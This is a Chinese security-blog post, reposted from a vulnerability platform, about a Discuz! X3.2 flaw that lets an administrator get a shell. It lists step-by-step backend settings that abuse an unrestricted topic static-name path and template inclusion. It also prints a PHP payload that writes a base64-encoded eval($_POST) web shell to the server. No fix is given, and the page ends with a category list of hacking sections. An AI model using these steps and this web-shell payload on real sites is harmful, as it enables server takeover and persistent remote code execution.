Discuz3.2漏洞文件包含漏洞可后台拿shell

作者：qxz_xp 发布：2014-07-23 08:34 分类：漏洞公布, 网络安全暂无评论

简要描述：
最新版本：Discuz! X3.2 Release 20140618

包括以前版本

详细说明：

由于创建专题时未对

静态化名称
做任何限制引发此漏洞
1.全局->站点信息

网站 URL:

http://www.comsenz.com/#<?phpfile_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=’));?>

2.工具->更新缓存

3.门户->HTML管理
静态文件扩展名: htm
专题HTML存放目录:data/cache

4.创建专题
静态化名称[此处未做任何限制]：../../template/default/portal/portal_topic_test

5.专题管理
对刚添加的专题开启并生成

6.再次创建专题
模板名选择刚生成的 ./template/default/portal/portal_topic_test.htm
提交

就执行了php代码

<?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=’));?>

不仅仅是可以生成到专题目录，可以生成到任何可以包含的下面！
漏洞证明：

漏洞来源与乌云。

原创文章转载请注明：转载自七行者博客

电脑维修 (22)
- 其它技术 (8)
- 台式机维修 (5)
- 显示器维修 (3)
- 电脑软件 (3)
- 笔记本维修 (4)
网站运营 (65)
- seo优化 (45)
- 新闻资讯 (3)
- 网上创业 (8)
- 网站建设 (10)
- 网站推广 (7)
网络安全 (89)
- 入侵检测 (6)
- 安全知识 (27)
- 最新资讯 (21)
- 漏洞公布 (35)
- 病毒预警 (8)
腾讯QQ (81)
- QQ个性签名 (10)
- QQ个性网名 (18)
- QQ头像 (45)
- QQ技术 (6)
- QQ空间 (4)
黑客攻防 (486)
- 业界新闻 (178)
- 社工相关 (27)
- 菜鸟入门 (119)
- 黑客工具 (105)
- 黑客技术 (139)